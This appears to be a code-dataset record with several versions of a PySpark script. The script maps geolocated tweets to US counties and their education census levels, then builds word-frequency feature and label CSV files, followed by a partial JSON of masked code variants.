for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
<|reserved_special_token_0|>
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
<|reserved_special_token_0|>
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
def combineWordLists(x, y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
<|reserved_special_token_0|>
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CACHE_DIR = 'D:\\TwitterDatastream\\PYTHONCACHE_SMALL'
EDU_DATA = 'merged.csv'
TRAIN_FEAT_CSV = 'testFeat.csv'
TRAIN_LABS_CSV = 'testLabs.csv'
TRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'
FEATURE_NAMES_CSV = 'featureNames.csv'
sc = SparkContext('local', 'test')
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
vocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())
location_data = pd.read_csv(EDU_DATA)
area_dict = dict(zip(location_data['city'], location_data[['fips',
'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))
county_dict = dict(zip(location_data['county'], location_data[['fips',
'without_hsd', 'with_hsd', 'somecollege', 'bachelors']].values.tolist()))
coord_dict = {tuple(x[:2]): x[2] for x in location_data[['lat', 'lng',
'county']].values}
latlon = list()
for index, row in location_data.iterrows():
latlon.append([location_data['lat'][index], location_data['lng'][index]])
latlon = np.array(latlon)
latlonKDT = spatial.KDTree(latlon)
def mapToCounty(place, location, coordinates):
if place:
place = place.split(',')[0].lower()
try:
if area_dict[place]:
return area_dict[place]
except:
None
if location:
location = location.split(',')[0].lower()
try:
if area_dict[location]:
return area_dict[location]
except:
None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,
distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[closest[0], closest[1]]
return county_dict[county_k]
return None
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == '':
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
return tweets
def load_tweet(tweet, tweets_saved):
try:
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try:
tweet_coordinates = tweet['coordinates']['coordinates']
except:
tweet_coordinates = None
try:
tweet_place = tweet['place']['full_name']
except:
tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location,
tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,
'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
tweets_saved += 1
return data, tweets_saved
wordPattern = re.compile('\\b[A-Za-z_.,!\\"\']+\\b', re.IGNORECASE)
httpPattern = re.compile('^RT |@\\S+|http\\S+', re.IGNORECASE)
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub('', text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words
return tweet
def combineWordLists(x, y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = x[0], wordDict
return x
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
def filterTweets(tweet):
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
if not text or text == []:
return False
if lang != 'en':
return False
if education is None or county is None:
return False
return True
def storeResults(traindata, vocab):
columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}
with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt'
) as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt'
) as trainFeatLabsFile:
trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainLabswriter = csv.writer(trainLabsFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
for row in traindata:
edu = row[0][1]
featDict = row[1]
feats = np.zeros(len(columnIdx))
for key in featDict:
try:
feats[columnIdx[key]] = featDict[key]
except:
continue
trainFeatwriter.writerow(feats.tolist())
trainLabswriter.writerow(list(edu))
combList = list(edu) + feats.tolist()
trainFeatLabswriter.writerow(combList)
def main():
fileNames = sc.parallelize([])
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(
root, file))
fileNames = sc.union([fileNames, subFileNames])
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda
tweet: filterTweets(tweet))
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda
tweet: filterTweets(tweet))
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],
tweet['tweet_education_level']), tweet['tweet_text']))
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)
).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True
)
print('vocabulary size = ', len(vocab))
storeResults(tempRes, vocab)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import bz2
import json
import os
from pyspark.context import SparkContext
from pyspark.accumulators import AccumulatorParam
import numpy as np
from scipy import spatial
import pandas as pd
import re
import operator
import csv
CACHE_DIR = "D:\TwitterDatastream\PYTHONCACHE_SMALL"
EDU_DATA = 'merged.csv'
TRAIN_FEAT_CSV = 'testFeat.csv'
TRAIN_LABS_CSV = 'testLabs.csv'
TRAIN_FEAT_LABS_CSV = 'testFeatLabs.csv'
FEATURE_NAMES_CSV = 'featureNames.csv'
sc = SparkContext('local', 'test')
# location_data = pd.read_csv('new_merged.csv')
class WordsSetAccumulatorParam(AccumulatorParam):
def zero(self, v):
return set()
def addInPlace(self, acc1, acc2):
return acc1.union(acc2)
# An accumulator used to build the word vocabulary
class WordsDictAccumulatorParam(AccumulatorParam):
def zero(self, v):
return dict()
def addInPlace(self, acc1, acc2):
for key in acc2.keys():
try:
acc1[key] += acc2[key]
except:
acc1[key] = acc2[key]
return acc1
# An accumulator used to build the word vocabulary
# vocabulary = sc.accumulator(set(), WordsSetAccumulatorParam())
vocabulary = sc.accumulator(dict(), WordsDictAccumulatorParam())
# load Education census data
location_data = pd.read_csv(EDU_DATA)
area_dict = dict(zip(location_data['city'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))
county_dict = dict(zip(location_data['county'], location_data[['fips', 'without_hsd','with_hsd', 'somecollege', 'bachelors']].values.tolist()))
coord_dict = {tuple(x[:2]):x[2] for x in location_data[['lat', 'lng', 'county']].values}
# create a KD tree of known county center locations to be used to map a tweet coordinate to a county
latlon = list()
for index, row in location_data.iterrows():
latlon.append([location_data['lat'][index], location_data['lng'][index]])
latlon = np.array(latlon)
latlonKDT = spatial.KDTree(latlon)
# function to map place, location or coordinate data from a tweet to a FIPS code of the county and the education
# level distribution of that county
def mapToCounty(place, location, coordinates):
# coordr_dict = {tuple(x[:2]):x[2] for x in location_data[['lat_r', 'lng_r', 'county']].values}
if place:
place = (place.split(",")[0]).lower()
# country = (place.split(",")[1]).lower()
try:
if area_dict[place]: return area_dict[place]
except: None
if location:
location = (location.split(",")[0]).lower()
try:
if area_dict[location]: return area_dict[location]
except: None
if coordinates:
closestLoc = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)[1]
try:
closest = latlon[closestLoc]
except:
return None
# closest = spatial.KDTree(latlon).query(coordinates, k=1, distance_upper_bound=9)
# if closest[0] != float('inf') and latlon[closest[1]][0] != 0. and latlon[closest[1]][1] != 0.:
# print(coordinates, closest, latlon[closest[1]])
# return closest[0], closest[1]
if coord_dict[closest[0], closest[1]]:
county_k = coord_dict[(closest[0], closest[1])]
return county_dict[county_k]
return None
# Load Tweets from each file (.bz2 or .json)
def load_bz2_json(filename):
if '.bz2' in filename:
with bz2.open(filename, 'rt') as f:
lines = str(f.read()).split('\n')
else:
with open(filename) as f:
lines = str(f.readlines()).split('\\n')
num_lines = len(lines)
tweets = []
for line in lines:
try:
if line == "":
num_lines -= 1
continue
tweets.append(json.loads(line))
except:
continue
# print(filename, len(tweets))
return tweets
# strip each tweet object and keep only whats necessary in a dictonary
def load_tweet(tweet, tweets_saved):
try:
# tweet_id = tweet['id']
tweet_text = tweet['text']
tweet_user_id = tweet['user']['id']
tweet_user_location = tweet['user']['location']
tweet_user_lang = tweet['user']['lang']
try: tweet_coordinates = tweet['coordinates']['coordinates']
except: tweet_coordinates = None
try: tweet_place = tweet['place']['full_name']
except: tweet_place = None
map_to_county = mapToCounty(tweet_place, tweet_user_location, tweet_coordinates)
if map_to_county:
tweet_county = int(map_to_county[0])
tweet_education_level = tuple(map_to_county[1:])
else:
tweet_county = None
tweet_education_level = None
# created_at = tweet['created_at']
except KeyError:
return {}, tweets_saved
data = {'tweet_text': tweet_text,
# 'tweet_id': tweet_id,
'tweet_user_id': tweet_user_id,
# 'tweet_user_location': tweet_user_location,
'tweet_user_lang': tweet_user_lang,
# 'tweet_place': tweet_place,
# 'tweet_coordinates': tweet_coordinates,
'tweet_county': tweet_county,
'tweet_education_level': tweet_education_level}
# 'date_loaded': datetime.datetime.now(),
# 'tweet_json': json.dumps(tweet)}
tweets_saved += 1
return data, tweets_saved
wordPattern = re.compile(r"\b[A-Za-z_.,!\"']+\b", re.IGNORECASE)
httpPattern = re.compile(r"^RT |@\S+|http\S+", re.IGNORECASE)
# Function that uses regular expressions to remove unwanted characters, URLs, etc. and split tweet_text
# into meaningful words
def parseTweetText(tweet):
text = tweet['tweet_text']
text = httpPattern.sub(r"", text)
words = wordPattern.findall(text)
tweet['tweet_text'] = words #list(zip(words, [1]*len(words)))
# print(tweet)
return tweet
# function to combine word lists and count frequency of each word locally
def combineWordLists(x ,y):
global vocabulary
if isinstance(x, dict):
wordDict = x
xny = y
else:
wordDict = dict()
xny = x + y
for w in xny:
# vocabulary +=[w]
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
return wordDict
# function to add words to the vocabulary and count frequency of each word globally
def genVocabulary(x):
global vocabulary
arr = x[1]
if isinstance(arr, dict):
return x
else:
wordDict = dict()
for w in arr:
vocabulary += {w: 1}
try:
wordDict[w] += 1
except:
wordDict[w] = 1
x = (x[0],wordDict)
return x
# read tweets from each file and parse them into dictionaries with only relevant data
def handle_file(filename):
tweets = load_bz2_json(filename)
tweet_dicts = []
tweets_saved = 0
for tweet in tweets:
tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)
if tweet_dict:
tweet_dicts.append(tweet_dict)
return tweet_dicts
# filter only tweets that have text, land, education and are written in english
def filterTweets(tweet):
# location = tweet['tweet_user_location']
# coordinates = tweet['tweet_place']
# place = tweet['tweet_coordinates']
text = tweet['tweet_text']
lang = tweet['tweet_user_lang']
education = tweet['tweet_education_level']
county = tweet['tweet_county']
# if location or coordinates or place: ret = True
# else: return False
if not text or text == []: return False
if lang != 'en': return False
if education is None or county is None: return False
return True
# store all data into CSV files
def storeResults(traindata, vocab):
columnIdx = {vocab[voc][0]: voc for voc in range(len(vocab))}
with open(TRAIN_FEAT_CSV, 'wt') as trainFeatFile, open(TRAIN_LABS_CSV, 'wt') as trainLabsFile, open(TRAIN_FEAT_LABS_CSV, 'wt') as trainFeatLabsFile:
trainFeatwriter = csv.writer(trainFeatFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainLabswriter = csv.writer(trainLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
trainFeatLabswriter = csv.writer(trainFeatLabsFile, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL, lineterminator='\n')
for row in traindata:
edu = row[0][1]
featDict = row[1]
feats = np.zeros(len(columnIdx))
for key in featDict:
try:
feats[columnIdx[key]] = featDict[key]
except:
continue
trainFeatwriter.writerow(feats.tolist())
trainLabswriter.writerow(list(edu))
combList = list(edu) + feats.tolist()
trainFeatLabswriter.writerow(combList)
# main function with all the Spark code
def main():
fileNames = sc.parallelize([])
# generate a list of all files in the data directory
for root, dirs, files in os.walk(CACHE_DIR):
subFileNames = sc.parallelize(files).map(lambda file: os.path.join(root, file))
fileNames = sc.union([fileNames, subFileNames])
# load all tweets and filter
tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda tweet: filterTweets(tweet))
# clean, parse and filter tweets and map each to county and education level
wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda tweet: filterTweets(tweet))
# set county and education level as the key for each tweet and keep only the text as value
countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'], tweet['tweet_education_level']), tweet['tweet_text']))
# aggregate tweets based on county level and generate vocabulary
countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)).map(lambda z: genVocabulary(z))
tempRes = countyEduRdd.collect()
# print(tempRes)
print(len(tempRes))
vocabRDD = sc.parallelize(vocabulary.value.items())
# filter out words that only occur once in the entire dataset (mainly noise)
vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)
# print("vocabulary = ", sorted(vocabulary.value.items(), key=operator.itemgetter(1)))
vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True)
# print("vocabulary = ", vocab)
print("vocabulary size = ", len(vocab))
storeResults(tempRes, vocab)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "ee58ed68d2f3c43f9611f6c6e4cd2b99adcb43d2",
"index": 2616,
"step-1": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\n<mask token>\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\n<mask token>\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\n<mask token>\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass WordsSetAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return set()\n\n def addInPlace(self, acc1, acc2):\n return acc1.union(acc2)\n\n\nclass WordsDictAccumulatorParam(AccumulatorParam):\n\n def zero(self, v):\n return dict()\n\n def addInPlace(self, acc1, acc2):\n for key in acc2.keys():\n try:\n acc1[key] += acc2[key]\n except:\n acc1[key] = acc2[key]\n return acc1\n\n\n<mask token>\n\n\ndef mapToCounty(place, location, coordinates):\n if place:\n place = place.split(',')[0].lower()\n try:\n if area_dict[place]:\n return area_dict[place]\n except:\n None\n if location:\n location = location.split(',')[0].lower()\n try:\n if area_dict[location]:\n return area_dict[location]\n except:\n None\n if coordinates:\n closestLoc = spatial.KDTree(latlon).query(coordinates, k=1,\n distance_upper_bound=9)[1]\n try:\n closest = latlon[closestLoc]\n except:\n return None\n if coord_dict[closest[0], closest[1]]:\n county_k = coord_dict[closest[0], closest[1]]\n return county_dict[county_k]\n return None\n\n\ndef load_bz2_json(filename):\n if '.bz2' in filename:\n with bz2.open(filename, 'rt') as f:\n lines = str(f.read()).split('\\n')\n else:\n with open(filename) as f:\n lines = str(f.readlines()).split('\\\\n')\n num_lines = len(lines)\n tweets = []\n for line in lines:\n try:\n if line == '':\n num_lines -= 1\n continue\n tweets.append(json.loads(line))\n except:\n continue\n return tweets\n\n\ndef load_tweet(tweet, tweets_saved):\n try:\n tweet_text = tweet['text']\n tweet_user_id = tweet['user']['id']\n tweet_user_location = tweet['user']['location']\n tweet_user_lang = tweet['user']['lang']\n try:\n tweet_coordinates = tweet['coordinates']['coordinates']\n except:\n tweet_coordinates = None\n try:\n tweet_place = tweet['place']['full_name']\n except:\n tweet_place = None\n map_to_county = mapToCounty(tweet_place, tweet_user_location,\n tweet_coordinates)\n if map_to_county:\n tweet_county = int(map_to_county[0])\n tweet_education_level = tuple(map_to_county[1:])\n else:\n tweet_county = None\n tweet_education_level = None\n except KeyError:\n return {}, tweets_saved\n data = {'tweet_text': tweet_text, 'tweet_user_id': tweet_user_id,\n 'tweet_user_lang': tweet_user_lang, 'tweet_county': tweet_county,\n 'tweet_education_level': tweet_education_level}\n tweets_saved += 1\n return data, tweets_saved\n\n\n<mask token>\n\n\ndef parseTweetText(tweet):\n text = tweet['tweet_text']\n text = httpPattern.sub('', text)\n words = wordPattern.findall(text)\n tweet['tweet_text'] = words\n return tweet\n\n\ndef combineWordLists(x, y):\n global vocabulary\n if isinstance(x, dict):\n wordDict = x\n xny = y\n else:\n wordDict = dict()\n xny = x + y\n for w in xny:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n return wordDict\n\n\ndef genVocabulary(x):\n global vocabulary\n arr = x[1]\n if isinstance(arr, dict):\n return x\n else:\n wordDict = dict()\n for w in arr:\n vocabulary += {w: 1}\n try:\n wordDict[w] += 1\n except:\n wordDict[w] = 1\n x = x[0], wordDict\n return x\n\n\ndef handle_file(filename):\n tweets = load_bz2_json(filename)\n tweet_dicts = []\n tweets_saved = 0\n for tweet in tweets:\n tweet_dict, tweets_saved = load_tweet(tweet, tweets_saved)\n if tweet_dict:\n tweet_dicts.append(tweet_dict)\n return tweet_dicts\n\n\ndef filterTweets(tweet):\n text = tweet['tweet_text']\n lang = tweet['tweet_user_lang']\n education = tweet['tweet_education_level']\n county = tweet['tweet_county']\n if not text or text == []:\n return False\n if lang != 'en':\n return False\n if education is None or county is None:\n return False\n return True\n\n\n<mask token>\n\n\ndef main():\n fileNames = sc.parallelize([])\n for root, dirs, files in os.walk(CACHE_DIR):\n subFileNames = sc.parallelize(files).map(lambda file: os.path.join(\n root, file))\n fileNames = sc.union([fileNames, subFileNames])\n tweetsRdd = fileNames.flatMap(lambda file: handle_file(file)).filter(lambda\n tweet: filterTweets(tweet))\n wordsRdd = tweetsRdd.map(lambda tweet: parseTweetText(tweet)).filter(lambda\n tweet: filterTweets(tweet))\n countyEduRdd = wordsRdd.map(lambda tweet: ((tweet['tweet_county'],\n tweet['tweet_education_level']), tweet['tweet_text']))\n countyEduRdd = countyEduRdd.reduceByKey(lambda x, y: combineWordLists(x, y)\n ).map(lambda z: genVocabulary(z))\n tempRes = countyEduRdd.collect()\n print(len(tempRes))\n vocabRDD = sc.parallelize(vocabulary.value.items())\n vocabRDD = vocabRDD.filter(lambda voc: True if voc[1] > 1 else False)\n vocab = sorted(vocabRDD.collect(), key=operator.itemgetter(1), reverse=True\n )\n print('vocabulary size = ', len(vocab))\n storeResults(tempRes, vocab)\n\n\n<mask token>\n",
